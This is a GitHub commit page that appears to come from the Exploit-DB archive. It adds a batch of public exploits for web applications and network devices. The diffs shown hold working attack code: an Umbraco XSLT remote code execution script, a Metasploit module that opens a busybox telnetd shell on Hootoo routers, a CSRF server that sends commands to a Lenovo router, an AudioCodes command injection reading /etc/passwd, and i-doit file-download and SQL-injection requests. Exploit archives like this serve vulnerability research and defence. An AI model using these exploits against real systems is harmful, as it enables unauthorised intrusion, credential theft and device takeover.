Skip to content

Commit 518c704

Browse files
author
Offensive Security
committed
DB: 2019-01-15
32 changes to exploits/shellcodes xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab) Dokany 1.2.0.1000 - Stack-Based Buffer Overflow Privilege Escalation Microsoft Windows 10 - SSPI Network Authentication Session 0 Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Open Privilege Escalation Microsoft Windows 10 - DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation Microsoft Windows 10 - DSSVC CanonicalAndValidateFilePath Security Feature Bypass Microsoft Windows 10 - DSSVC MoveFileInheritSecurity Privilege Escalation Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Hootoo HT-05 - Remote Code Execution (Metasploit) Across DR-810 ROM-0 - Backup File Disclosure i-doit CMDB 1.12 - Arbitrary File Download i-doit CMDB 1.12 - SQL Injection Horde Imp - 'imap_open' Remote Command Execution Modern POS 1.3 - Arbitrary File Download Modern POS 1.3 - SQL Injection Twilio WEB To Fax Machine System Application 1.0 - SQL Injection Live Call Support Widget 1.5 - Cross-Site Request Forgery (Add Admin) Live Call Support Widget 1.5 - Remote Code Execution / SQL Injection Craigs Classified Ads CMS Theme 1.0.2 - SQL Injection Find a Place CMS Directory 1.5 - SQL Injection Cleanto 5.0 - SQL Injection Lenovo R2105 - Cross-Site Request Forgery (Command Execution) HealthNode Hospital Management System 1.0 - SQL Injection Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account) ThinkPHP 5.X - Remote Command Execution Real Estate Custom Script 2.0 - SQL Injection Job Portal Platform 1.0 - SQL Injection Umbraco CMS 7.12.4 - Authenticated Remote Code Execution Bigcart - Ecommerce Multivendor System 1.0 - SQL Injection Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection AudioCode 400HD - Command Injection
1 parent 0495dc4 commit 518c704

33 files changed

Lines changed: 2346 additions & 0 deletions

exploits/aspx/webapps/46153.py

Lines changed: 63 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,63 @@
1+
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
2+
# Dork: N/A
3+
# Date: 2019-01-13
4+
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
5+
# Vendor Homepage: http://www.umbraco.com/
6+
# Software Link: https://our.umbraco.com/download/releases
7+
# Version: 7.12.4
8+
# Category: Webapps
9+
# Tested on: Windows IIS
10+
# CVE: N/A
11+
12+
13+
import requests;
14+
15+
from bs4 import BeautifulSoup;
16+
17+
def print_dict(dico):
18+
print(dico.items());
19+
20+
print("Start");
21+
22+
# Execute a calc for the PoC
23+
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
24+
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
25+
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
26+
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
27+
{ string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
28+
proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\
29+
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
30+
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
31+
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
32+
</xsl:template> </xsl:stylesheet> ';
33+
34+
login = "XXXX;
35+
password="XXXX";
36+
host = "XXXX";
37+
38+
# Step 1 - Get Main page
39+
s = requests.session()
40+
url_main =host+"/umbraco/";
41+
r1 = s.get(url_main);
42+
print_dict(r1.cookies);
43+
44+
# Step 2 - Process Login
45+
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
46+
loginfo = {"username":login,"password":password};
47+
r2 = s.post(url_login,json=loginfo);
48+
49+
# Step 3 - Go to vulnerable web page
50+
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
51+
r3 = s.get(url_xslt);
52+
53+
soup = BeautifulSoup(r3.text, 'html.parser');
54+
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
55+
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
56+
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
57+
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
58+
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
59+
60+
# Step 4 - Launch the attack
61+
r4 = s.post(url_xslt,data=data,headers=headers);
62+
63+
print("End");

exploits/cgi/webapps/46164.txt

Lines changed: 66 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,66 @@
1+
# [CVE-2018-10093] Remote command injection vulnerability in AudioCode IP phones
2+
3+
## Description
4+
5+
The AudioCodes 400HD series of IP phones consists in a range of
6+
easy-to-use, feature-rich desktop devices for the service provider
7+
hosted services, enterprise IP telephony and contact center markets.
8+
9+
The CGI scripts used on the 420HD phone (web interface) do not filter
10+
user inputs correctly. Consequently, an authenticated attacker could
11+
inject arbitrary commands (Remote Code Execution) and take full control
12+
over the device. For example, it is possible to intercept live
13+
communications.
14+
15+
## Vulnerability records
16+
17+
18+
**CVE ID**: CVE-2018-10093
19+
20+
**Access Vector**: remote
21+
22+
**Security Risk**: medium
23+
24+
**Vulnerability**: CWE-78
25+
26+
**CVSS Base Score**: 7.2
27+
28+
**CVSS Vector String**:
29+
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
30+
31+
32+
## Details
33+
34+
The script `command.cgi`, used for system monitoring and diagnostics, is
35+
vulnerable to a remote command execution attack.
36+
37+
Visiting the `/command.cgi?cat%20/etc/passwd` gives the following result:
38+
39+
```
40+
admin:$1$FZ6rOGS1$54ZXSmjh7nod.kXFRyLx70:0:0:root:/:/bin/sh
41+
```
42+
43+
Note that the vulnerable page is only available to authenticated users
44+
(in possession of the admin configuration password).
45+
46+
## Timeline (dd/mm/yyyy)
47+
48+
* 06/03/2018 : Initial discovery
49+
* 17/04/2018 : Vendor contact
50+
* 17/05/2018 : Vendor technical team aknowledgment
51+
* 07/01/2019 : Vendor recommendation to mitigate the issue
52+
* 10/01/2019 : Public disclosure
53+
54+
## Fixes
55+
56+
AudioCodes recommends to change the default admin credentials to
57+
mitigate the issue.
58+
59+
## Affected versions
60+
61+
Theses vulnerabilities have only been tested on the 420HD phone
62+
(firmware version: 2.2.12.126).
63+
64+
## Credits
65+
66+
a.baube at sysdream dot com

exploits/hardware/remote/46143.rb

Lines changed: 82 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,82 @@
1+
require 'msf/core'
2+
require 'net/http'
3+
require "uri"
4+
5+
class MetasploitModule < Msf::Exploit::Remote
6+
7+
include Msf::Exploit::Remote::Tcp
8+
9+
#
10+
#Descrizione del Exploit
11+
#
12+
def initialize(info = {})
13+
super(update_info(info,
14+
'Name' => 'Hootoo HT-05 remote shell exploit',
15+
16+
'Description' => %q{
17+
This module tries to open a door in the device by exploiting the RemoteCodeExecution by creating a backdoor inside the device
18+
This exploit was written by Andrei Manole. Version of the frimware 2.000.022. Tested on 2.00.0.82 -> it still works
19+
},
20+
'Author' => 'Andrei Manole',
21+
'References' =>
22+
[
23+
],
24+
'Privileged' => true,
25+
'Platform' => [ 'unix' ],
26+
'Arch' => ARCH_CMD,
27+
'Payload' =>
28+
{
29+
'Space' => 2000,
30+
'BadChars' => '',
31+
'DisableNops' => true,
32+
'Compat' =>
33+
{
34+
'PayloadType' => 'cmd_interact',
35+
'ConnectionType' => 'find'
36+
}
37+
}, #fine del settaggio del payload
38+
'Targets' =>
39+
[
40+
[ 'Automatic', { } ],
41+
],
42+
'DisclosureDate' => "20 Dicembre 2018",
43+
'DefaultTarget' => 0))
44+
45+
register_options([ Opt::RPORT(6666) ], self.class)
46+
47+
end
48+
49+
def send_request(host,port) #funzione di invio
50+
51+
uri = URI.parse("http://#{host}/protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|/bin/busybox%20telnetd%20-l/bin/sh%20-p#{port}")
52+
http = Net::HTTP.new(uri.host, uri.port)
53+
54+
request = Net::HTTP::Get.new(uri.request_uri)
55+
response = http.request(request)
56+
57+
if response.code == 200 || response.message == 'OK' || response.class.name == 'HTTPOK' then
58+
return true
59+
end
60+
61+
return false
62+
63+
end
64+
65+
def exploit #exploit
66+
67+
print_status("[+] Apertura backdoor in corso...")
68+
if !send_request(datastore['RHOST'],datastore['RPORT']) then #controllo della funzione di invio , passando i dati scelti dal utenti mediante il datastore[] di msf.
69+
raise("[-] Errore nel apertura della porta")
70+
end
71+
print_good("[+] Richiesta inviata con successo! :)")
72+
nsock = self.connect(false, {"RPORT" => datastore['RPORT']}) rescue nil #inizio a fare la conessione
73+
print_good("[+] Porta aperta con successo ! :)")
74+
nsock.put(payload.encoded + " >/dev/null 2>&1") #passo il payload per creare una communicazione con la /bin/sh create sulla porta, ">/dev/null 2>&1" invio Stand Error in un backhole e dopo su 1 -> Standard Out.
75+
handler(nsock)
76+
77+
return
78+
end
79+
80+
end
81+
82+
Sent with [ProtonMail](https://protonmail.com) Secure Email.
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
#Exploit Title: Across DR-810 ROM-0 Backup - File Disclosure(Sensitive Information)
2+
#Date: 2019-01-11
3+
#Exploit Author: SajjadBnd
4+
#My Email: blackwolf@post.com
5+
#Vendor Homepage: http://www.ac.i8i.ir/
6+
#Version: DR-810
7+
#Tested on: DR-810
8+
#RomPager/4.07 UPnP/1.0
9+
10+
[+] About
11+
==========
12+
this hardware is a SIM card modem , This modem is being installed in Iran and sold with the SIM card
13+
i8i.ir An internet site that sells products like SIM-card modems This modem has sold countless And on the main page of the site wrote:
14+
15+
SIM modems are used in a variety of ways and for similar uses, and depending on the features and quality, they have a variety of prices.
16+
In this site, you will be familiar with the five modem and router sim-modem groups, which you can consult with us to choose the best option for you, and choose one of them.
17+
18+
[+] Rom-0 Backup File Disclosure
19+
=================================
20+
A dangerous vulnerability present on many network devices which are using
21+
RomPager.The rom-0 file contains sensitive information such as the router password.
22+
There is a disclosure in which anyone can download that file without any authentication by
23+
a simple GET request.
24+
25+
[+] POC
26+
========
27+
just add /rom-0 to your target address
28+
rom-0 Backup File will be downloaded
29+
30+
http://target/rom-0
31+
32+
then you can Decompressed the file and get password

exploits/hardware/webapps/46147.py

Lines changed: 47 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,47 @@
1+
# Exploit Title: Lenovo R2105 Remote Code Execution through CSRF
2+
# Date: 01/14/2019
3+
# Exploit Author: Nathu Nandwani
4+
# Website: http://nandtech.co/
5+
# Version: 1.0
6+
# Tested on: Windows 10 x64
7+
# Note: The administrator who opens the URL should be authenticated.
8+
9+
import socket
10+
11+
server_ip = "0.0.0.0"
12+
server_port = 80
13+
router_ip = "192.168.11.1"
14+
15+
command = "reboot"
16+
17+
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18+
sock.bind((server_ip, server_port))
19+
sock.listen(1)
20+
21+
print "Currently listening at " + server_ip + ":" + str(server_port)
22+
23+
client, (client_host, client_port) = sock.accept()
24+
25+
print "Client connected: " + client_host + ":" + str(client_port)
26+
print ""
27+
print client.recv(1000)
28+
29+
client.send('HTTP/1.0 200 OK\r\n')
30+
client.send('Content-Type: text/html\r\n')
31+
client.send('\r\n')
32+
client.send("""
33+
<html>
34+
<body>
35+
<form method="post" id="frmcmd" name="frmSetup" action="http://""" + router_ip + """/goform/SystemCommand">
36+
<input name="command" value=""" + command + """ type="hidden">
37+
<input name="SystemCommandSubmit" value="Apply" type="hidden">
38+
</form>
39+
<script>
40+
document.getElementById("frmcmd").submit();
41+
</script>
42+
</body>
43+
</html>
44+
""")
45+
46+
client.close()
47+
sock.close()

exploits/php/webapps/46133.txt

Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
# Exploit Title: i-doit CMDB 1.12 - Arbitrary File Download
2+
# Dork: N/A
3+
# Date: 2019-01-11
4+
# Exploit Author: Ihsan Sencan
5+
# Vendor Homepage: https://www.i-doit.org/
6+
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
7+
# Version: 1.12
8+
# Category: Webapps
9+
# Tested on: WiN7_x64/KaLiLinuX_x64
10+
# CVE: N/A
11+
12+
# POC:
13+
# 1)
14+
# http://localhost/[PATH]/index.php?file_manager=image&file=[FILE]
15+
# Users..
16+
#
17+
18+
GET /[PATH]/index.php?file_manager=image&file=src/config.inc.php HTTP/1.1
19+
Host: TARGET
20+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
21+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
22+
Accept-Language: en-US,en;q=0.5
23+
Accept-Encoding: gzip, deflate
24+
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
25+
Connection: keep-alive
26+
HTTP/1.1 200 OK
27+
Date: Sat, 12 Jan 2019 17:30:16 GMT
28+
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
29+
X-Powered-By: PHP/5.6.30
30+
Expires: Sat, 12 Jan 2019 19:30:17 GMT
31+
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
32+
Pragma: no-cache
33+
i-doit-Authorized: 1
34+
Last-Modified: Sat, 12 Jan 2019 17:30:17 GMT
35+
Content-Length: 1282
36+
Content-Disposition: inline; filename="src/config.inc.php"
37+
Content-Transfer-Encoding: binary
38+
Keep-Alive: timeout=5, max=100
39+
Connection: Keep-Alive
40+
Content-Type: application/octet-stream

exploits/php/webapps/46134.txt

Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
# Exploit Title: i-doit CMDB 1.12 - SQL Injection
2+
# Dork: N/A
3+
# Date: 2019-01-11
4+
# Exploit Author: Ihsan Sencan
5+
# Vendor Homepage: https://www.i-doit.org/
6+
# Software Link: https://netcologne.dl.sourceforge.net/project/i-doit/i-doit/1.12/idoit-open-1.12.zip
7+
# Version: 1.12
8+
# Category: Webapps
9+
# Tested on: WiN7_x64/KaLiLinuX_x64
10+
# CVE: N/A
11+
12+
# POC:
13+
# 1)
14+
# http://localhost/[PATH]/?objGroupID=[SQL]
15+
# Users..
16+
#
17+
18+
GET /[PATH]/?objGroupID=%31%32%27%7c%7c%28SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20%28seLEcT%20112%20frOM(SElecT%20CouNT(*)%2cConCAT%28CONcat(0x203a20%2cUseR()%2cDAtaBASe()%2cVErsION())%2c(SeLEct%20%28ELT(112=112%2c1%29%29%29%2cFLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x%29a%29%29%7c%7c%27 HTTP/1.1
19+
Host: TARGET
20+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
21+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
22+
Accept-Language: en-US,en;q=0.5
23+
Accept-Encoding: gzip, deflate
24+
Cookie: PHPSESSID=h6qbu3jsemq9en8c3epiri8323
25+
Connection: keep-alive
26+
HTTP/1.1 200 OK
27+
Date: Sat, 12 Jan 2019 16:47:58 GMT
28+
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
29+
X-Powered-By: PHP/5.6.30
30+
Expires: Thu, 19 Nov 1981 08:52:00 GMT
31+
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
32+
Pragma: no-cache
33+
i-doit-Authorized: 1
34+
X-i-doit-Notification-0: {"message":"Database error : Query error: 'SELECT DISTINCT(isys_obj_type_group__const) FROM isys_obj_type\r\n\t\t\tINNER JOIN isys_obj_type_group ON isys_obj_type_group__id = isys_obj_type__isys_obj_type_group__id WHERE isys_obj_type_group__status = 2 AND isys_obj_type_group__id = '12'||(SeleCT 'Efe' FroM duAL WheRE 110=110 AnD (seLEcT 112 frOM(SElecT CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct (ELT(112=112,1))),FLooR(RAnd(0)*2))x FROM INFOrmatION_SchEMA.PluGINS grOUp BY x)a))||'' ORDER BY isys_obj_type_group__sort, isys_obj_type_group__const ASC LIMIT 0,1':\nDuplicate entry ' : admin@localhostidoit_data10.1.21-MariaDB11' for key 'group_key'\n","type":2,"options":{"sticky":true,"width":"400px","header":""}}
35+
Keep-Alive: timeout=5, max=87
36+
Connection: Keep-Alive
37+
Transfer-Encoding: chunked
38+
Content-Type: text/html; charset=utf-8

0 commit comments

Comments
 (0)